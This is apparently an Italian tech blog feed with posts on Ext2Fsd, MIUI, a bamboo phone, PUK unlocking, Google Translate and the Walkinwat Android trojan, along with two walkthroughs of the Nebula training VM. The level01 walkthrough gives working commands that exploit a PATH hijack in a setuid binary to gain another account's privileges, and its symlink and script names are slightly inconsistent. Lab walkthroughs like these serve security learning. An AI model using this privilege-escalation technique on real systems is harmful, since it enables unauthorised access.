Continua la lettura »]]> Linux e Windows usano file system differenti: ntfs per Windows e Ext2/Ext3 (Extended2) Linux. Un disco formattato con file system ntfs non vede Linux. Fortunatamente esistono software come Ext2Fds. Il programma in questione permette di accedere (in lettura e scrittura) a partizioni Linux EXT2, EXT3 e EXT4 direttamente da Windows 2000, XP, Vista e Windows 7. Piccolo neo di questo fantastico software è che, con il file system ext4, sarà impostata solo la modalità di lettura. Appena aperto, il tool elencherà tutte le partizioni presenti su tutti i dischi, quindi cliccare col destro del mouse sulla partizione di linux che si desidera montare e selezionare la voce change letter drive.

Nella finestra che si aprirà cliccare su Add per veder comparire una schermata con alcune opzioni:

in alto è possibile selezionare la lettera da assegnare, in basso bisognerà scegliere tra tre opzioni, nell’ordine dall’alto verso in basso:

• Il primo rende l’assegnazione valida solo per la sessione corrente: se si riavvia il sistema si perde l’assegnazione.
• Il secondo è buono per i dischi rigidi removibili: all’unità viene assegnata la lettera data appena il disco viene inserito se e solo se ext2 volume manager è attivo. Se la lettera è occupata da qualche altra unità, (ad esempio s’inseriscono più dischi removibili in formato fat32/ntfs) il disco non sarà visibile.
• Il terzo è ottimo per le partizioni su disco fisso: la lettera sarà sempre presente in risorse del computer, anche se la partizione non è raggiungibile.

L’opzione predefinita va più che bene, bisogna solo dare l’ok ed eventualmente riavviare il sistema, se richiesto.

Ecco il link per scaricare il programma

Continua la lettura »]]> Finalmente la mitica rom MIUI diventa open-source grazie al rilascio del codice sorgente da parte del team di sviluppo cinese Xiaomi. La strepitosa notizia arriva direttamente dal sito ufficiale MIUI.
Questa Rom viene apprezzata dagli utenti per la sua velocità fuori dal comune e per la grafica molto personalizzata e personalizzabile. Ricordiamo che questo custom firmware è disponibile per moltissimi dispositivi, nonché utilizzato di default sullo smartphone Xiaomi   Mi-One che sta riscontrando un enorme successo.

Continua la lettura »]]> Bamboo ADzero è il primo smartphone Android realizzato interamente in legno. L’idea è di uno studente britannico di 23 anni della Middlesex University, Kieron-Scott Woodhouse, che grazie ad una importante collaborazione con un produttore cinese, è riuscito a realizzare questa “opera d’arte” moderna. Il progetto prevede l’utilizzo di un singolo pezzo di Baboo di 4 anni di età, trattato in modo particolare ed estremamente resistente. Ovviamente è solo la scocca esterna ad essere di materiale naturale, display, parti meccaniche e interno sono ovviamente realizzate come ogni altro device. Quindi se siete amanti della natura, amate i design particolare, o semplicemente siete alla ricerca di uno smartphone unico nel suo genere, ADzero potrebbe essere la scelta giusta per voi.
Bamboo ADzero verrà commercializzato in Cina entro l’anno e potrebbe debuttare anche in Europa e in particolar modo nela Regno Unito. Prezzo non comunicato.

Continua la lettura »]]> Oggi mi è capitato di trovare il mio LG P350 con la sim bloccata dal codice PUK.  Il motivo non mi è chiaro.. forse stando in tasca avrò riavviato il cellulare ed inserito, senza volerlo, più volte un PIN sbagliato. Comunque, mi son trovato nella situazione di dover cercare la scheda contenente la SIM così da grattare e ricavare il codice PUK. Una volta trovato però mi si è presentato il problema di capire come fare e dove inserire questo codice. Il procedimento qui di seguito si riferisce alla rom Cyanogen MOD, dal momento che non ho idea se lo stesso valga in ROM ufficiali o in altre mod. Io monto Cyanogen e posso assicurare che funziona solo su questa rom. Tutto ciò che dovremo fare è tappare sulle chiamate d’emergenza e digitare questo codice: **05*<Codice PUK>*<NUOVO CODICE PIN>*<NUOVO CODICE PIN># . A questo punto il cellulare si avvierà normalmente e avrà il nuovo codice PIN impostato.

Continua la lettura »]]> Continuano gli esercizi di Exploit-Exercises. La volta scorsa abbiamo visto il livello 00 ( il più facile ovviamente ).. Ora è arrivato il momento di passare al livello 01, grazie anche alla collaborazione di mattandreko.com. Apriamo la nostra macchina virtuale, qui  l’articolo, ed effettuiamo il login con User e Pass “level01“. Il sito ufficiale ci indica cosa fare: “There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01 . Files for this level can be found in /home/flag01.” Quindi è presente una vulnerabilità in un programma situato nella directory “/home/flag01″ che consente l’esecuzione di codice arbitrario. Diamo un occhio al codice sorgente, preso dal sito ufficiale.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

system("/usr/bin/env echo and now what?");
}

Analizziamo il codice. I tipi gid_t e uid_t sono definiti all’interno di “sys/types.h” ed indicano rispettivamente il tipo ID del gruppo e ID dello user.  Le funzioni getegid() e geteuid(), contenute all’interno di “unistd.h” permettono di ricavare l’effettivo ID rispettivamente del gruppo e dello user. Sempre in questo include, troviamo le funzioni setresgid() e setresuid() che permettano di impostare l’ID reale, effettivo e salvato rispettivamente del gruppo e dello user. Alla fine la funzione system() permette di eseguire un comando attraverso la shell “/bin/sh -c comando“. “echo” scrive qualcosa da mostrare a schermo. In questo caso viene caricato il percorso ad “echo” dalle variabili di sistema. Quindi esso leggerà cosa c’è nel percorso. Ci basterà modificare la variabile PATH (all’interno di questa variabile si hanno i diversi percorsi divisi da 2 punti (:) che contengono eseguibili da avviare direttamente da terminale). Diamo quindi:

level01@nebula:/home/flag01$ PATH=/tmp:$PATH level01@nebula:/home/flag01$ export PATH

A questo punto, ci basterà vedere cosa c’è all’interno della variabile PATH per veder spuntare anche il percorso “/tmp“.  Chiamando “echo”, quindi, esso andrà a vedere per prima nel percorso appena aggiungo “/tmp“. Ora possiamo creare un link simbolico tra la directory temporanea e la bash in questo modo:

level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/echoo

Ora possiamo sfruttare un echo e redirezionare lo standard output (“>”) sul file /tmp/echo in questo modo:

level01@nebula:/home/flag01$ echo -e '#!/bin/bash\n/tmp/echo2' > /tmp/echo
level01@nebula:/home/flag01$ chmod +x /tmp/echo

Ci basterà a questo punto avviare il programma con

level01@nebula:/home/flag01$ ./flag01

e verificare la riuscita con getflag

flag01@nebula:/home/flag01$ getflag

You have successfully executed getflag on a target account

Continua la lettura »]]> Proprio in un altro articolo vi parlavo di scaricare macchine virtuali, con Ubuntu, predisposte per esercitarsi nell’arte dell’hacking. Vediamo quindi come si svolge il primo livello di questo “gioco”. Installiamo la macchina virtuale e procediamo ad effettuare il login con user : “level00″ e password: “level00″. Come potrete già capire, si accede ai diversi livelli attraverso i dati di autenticazione. Dando un’occhiata alla documentazione del livello 00 ci si rende conto di cosa dobbiamo fare. Il sito riporta queste parole: “This level requires you to find a Set User ID program that will run as the “flag00″ account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page“. Il Set User ID, conosciuto anche come setuid, è un particolare tipo di permesso che consente ad un utente di eseguire un programma con i privilegi del proprietario di tale file. Dobbiamo, quindi, trovare un programma il cui proprietario è “flag00″. Usando il comando find, così come suggerito dalla documentazione, saremo in grado di trovare ed elencare file e directory il cui proprietario è “flag00″. Diamo un’occhiata al manuale di find e diamo i seguenti comandi:

find / -executable -user flag00

L’output si presenterà molto confuso, con una serie di “Permession denied”. In mezzo a tutte queste linee, troveremo comunque quelle che riguardano l’utente “flag00″. Ci basterà fare chiarezza e aggiungere poche righe per redirezionare l’output degli errori a “nulla“. Scriviamo quindi i seguenti comandi:

find / -executable -user flag00 2> /dev/null

Ecco spariti tutti gli errori ed apparire solo due righe che ci svelano i file con proprietario “flag00″.

/home/flag00
/bin/.../flag00

Dei due è eseguibile il file /bin/…/flag00.. Digitiamo quindi questo comando ed avviamo il programmino

/bin/.../flag00

Eccoci come risultato:

level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

Questo è il livello 00

Continua la lettura »]]> Ho scoperto questo interessantissimo sito dove è possibile esercitarsi nell’analisi di vulnerabilità, sviluppo di exploit, debugging, reverse engineering e possesso di privilegi in ambiente Linux. Il sito cita testuali parole: “exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering. ” Diviso in tre livelli, Nebula, Protostar e Fusion permette rispettivamente di esercitarsi su un livello base (per gli utenti nuovi a Linux) riguardo ai privilegi ed errori di linguaggio script e file system per poi proseguire su un livello intermedio con corruzione della memoria e buffer overflow per poi finire al livello avanzato che mantiene l’argomento riguardante la memoria per aggiungere formato di stringhe ed exploit della memoria Heap. Per iniziare ad esercitarsi basta andare sul sito Exploit Exercises, scegliere il proprio livello preferito e procedere al download della relativa macchina virtuale. Buon Hacking!

Continua la lettura »]]> Tra la sua ampia offerta di software, Google prevede anche un ottimo software di traduzione: uno tra i migliori attualmente in circolazione. Google Translate, così si chiama, è disponibile sia online sia come software per i dispositivi mobile. La versione attuale per Android, nel momento della stesura di questo articolo, è la 2.3. Un’importante novità introdotta riguarda la scrittura a mano. Da ora in poi sarà possibile inserire sullo schermo, scrivendola, la frase da tradurre. Molto utile nel caso in cui il riconoscimento vocale non dovesse funzionare. Il riconoscimento della grafia è disponibile per le seguenti lingue: cinese, inglese, francese, tedesco, italiano, giapponese e spagnolo. Per attivarlo basta premere il tasto menù, scegliere Impostazioni ed andare sulla scheda grafia. Ci troveremo accanto alla casella di testo, il simbolo di una penna. Tappiamo e col dito scriviamo ciò che vogliamo cercare. Per scaricarlo basta andare sull’Android Market di Google.

Continua la lettura »]]> Più si possiede un cellulare tecnologicamente avanzato, più si rischia di essere vulnerabili e di incorrere in virus che possono essere molto pericolosi. In questo articolo ci riferiamo al virus che colpisce i sistemi Android segnalato dal sito NOD32 che prende il nome di Walkinwat. La grandezza del file è di 13188 byte e si trova in un Android Market non ufficiale (per capirci quei market dove trovare software illegale e scaricare gratis quello a pagamento). Al momento tale virus si trova all’interno del file “a Walk and Text v1.3.7android app cracked full.apk” e può compiere le seguenti azioni: “Accesso a tutti i contatti della rubrica, Accesso alle informazioni di rete, Accesso al telefono in stato di sola lettura, Accesso alla vibrazione del telefono, Verificare la licenza server dell’applicazione, Trovare la posizione del telefono, Avviare una chiamata telefonica senza l’uso dell’interfaccia, Aprire il socket di rete per accedere a Internet, Leggere i file di rapporto a basso livello, Inviare messaggi SMS, Accendere e spegnere il telefono“. Oltre a questo, il trojan sottrae Nome, Numero di telefono e codice IMEI per inviare successivamente queste informazioni ad un server remoto (http://incorporateapps.com/wat.php). Walkinwat, inoltre, invierà a tutti i nostri contatti il seguente messaggio

Hey,just downloded a pirated App off the Internet, Walk and Text for Android.
Im stupid and cheap,it costed only 1 buck.Don't steal like I did!

e a schermo ci apparirà questo:

 Application Not Licensed
We really hope you learned something from this. Check your phone bill;)
Oh and dont forget to buy the App from the Market

Prestate quindi molta attenzione a determinati e file e cercate di non scaricare software in modo illegale da altri Android Market.